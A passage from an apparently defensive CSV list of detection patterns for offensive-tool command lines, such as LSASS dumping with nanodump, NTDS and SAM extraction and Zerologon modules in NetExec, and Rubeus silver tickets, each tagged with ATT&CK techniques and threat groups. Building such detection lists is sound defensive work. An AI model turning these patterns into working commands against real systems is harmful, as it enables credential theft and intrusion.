sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -* SigFlip.exe*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -* SigFlip.PE*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -* sigflip.x64.*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -* sigflip.x86.*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -* SigLoader *,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -* --sign-domain *,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* --sign-steal *,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* Sigwhatever*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,0,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -* --silent -obf NixImports -o /tmp/*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* --silent-process-exit *,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* silenttrinity.*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -* silver * /domain*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* silver * /ldap *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* silver * /passlastset *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* silver * /service:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* --single shadow.hashes*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* sip-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* sip-call-spoof.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* sip-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* sip-log4shell.nse*,offensive_tool_keyword,nmap,Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Diverto/nse-log4shell,1,0,N/A,N/A,4,347,51,2021-12-20T15:34:21Z,2021-12-12T22:52:02Z -* sip-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* sitadel.py*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -* -SiteListFilePath * -B64Pass *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Get-System.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --skip-crawl*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*- --skippasswordcheck*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --skipregistryloggedon*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - 
TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* skypev2-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* sliver sliver*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -* smb * --dpapi *password*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* smb * --gen-relay-list *.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* smb * --lsa --log *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - 
TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* smb * -M lsassy*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -M masky -o CA=*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -M msol *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* smb * -M ntlmv1 *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* smb * -M rdp -o ACTION=enable*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential 
Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -M runasppl*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -M zerologon*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * --ntds --log *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* smb * --sam --log *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* smb * -u * -p * * -M dfscoerce*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential 
Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -u * -p * * --rid-brute*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -u * -p * * --shares --filter-shares *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -u * -p * * -X whoami --obfs*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -u * -p * -M enum_av*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -u * -p * -M enum_dns*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential 
Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -u * -p * -M gpp_password*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb * -u * -p * -M met_inject *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -"* smb * -u * -p * --wmi ""select Name from win32_computersystem""*",offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* smb client * shares *use c$*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* smb -M mimikatz 